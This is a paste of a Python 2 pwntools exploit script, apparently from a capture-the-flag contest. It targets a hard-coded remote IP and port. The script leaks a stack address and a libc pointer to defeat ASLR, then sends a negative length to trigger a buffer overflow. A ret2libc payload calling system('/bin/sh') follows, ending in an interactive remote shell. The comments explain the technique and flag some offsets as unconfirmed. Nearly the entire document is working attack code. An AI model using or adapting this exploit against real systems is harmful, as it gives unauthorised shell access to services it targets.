
Untitled

a guest
Nov 18th, 2017
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""CTF exploit script (pwntools, Python 2 syntax).

Connects to a remote service, reads two addresses the service echoes back
after a 16-byte input, derives the libc base from a local copy of the
target's libc, and then sends an over-long input carrying libc's system()
address and the address of a "/bin/sh" string.

Defender notes: the echoed pointer is what defeats ASLR here -- every libc
address is computed from that single leak plus offsets taken from the
matching libc build, so a leak-free service would break the whole chain.
The overflow step relies on the service accepting a negative length
("-1") before reading the long input.

NOTE: uses `print` statements and mixes str/bytes freely, so this only
runs under Python 2 with a Python-2 pwntools.
"""
from pwn import *


# Remote endpoint exactly as given on the paste.
host = "35.198.98.140"
port = 45067

# Local copy of the target's libc; the symbol offsets below are read from
# it, so it must be the same build the remote service is linked against.
libc=ELF('./libc.so.6')
p = remote(host,port)

offset=libc.symbols['setbuffer']    # offset of setbuffer within libc
system_off=libc.symbols['system']   # offset of system within libc
# Hard-coded rather than looked up via libc.search(); presumably the offset
# of a "/bin/sh" string in this particular libc build -- TODO confirm.
sh_offset=0x015cd48

p.recvuntil(":")
# Exactly 16 bytes; the trailing 'ab' marks where the echoed data starts.
p.send('a'*15+'b')
p.recvuntil('ab')
# Everything echoed after the input, with the 14-character
# "Enter length: " prompt cut off the end.
data=p.recvuntil("Enter length: ")[:-14]
# First 4 leaked bytes, read little-endian: an address inside the input buffer.
buff_adr=int(enhex(data[:4][::-1]),16)
# Last 4 leaked bytes, read little-endian: a pointer into setbuffer. The -11
# rewinds it to the symbol start -- an assumed constant, TODO confirm.
setbuffer_addr=int(enhex(data[-4:][::-1]),16)-11
print "buffer"
print hex(buff_adr)
libc_base=setbuffer_addr-offset     # leaked address minus its offset = libc base
sh=libc_base+sh_offset
print "libc_base"
print hex(libc_base)
print "system"
print hex(libc_base+system_off)
print "/bin/sh"
print hex(sh)
# Negative length; the service presumably accepts it, which is what lets
# the following sendline exceed the buffer.
p.sendline("-1")
print p.recvuntil(":")


# Layout: 80 filler bytes, a pointer back into the input buffer (+0x10),
# 28 more filler bytes, then system's address followed by ten copies of
# the "/bin/sh" string address. No error handling: a wrong offset simply
# crashes the remote process.
payload="a"*80+p32(buff_adr+0x10)+28*"a"+p32(libc_base+system_off)+p32(sh)*10
p.sendline(payload)
p.interactive()   # hand the connection over to the operator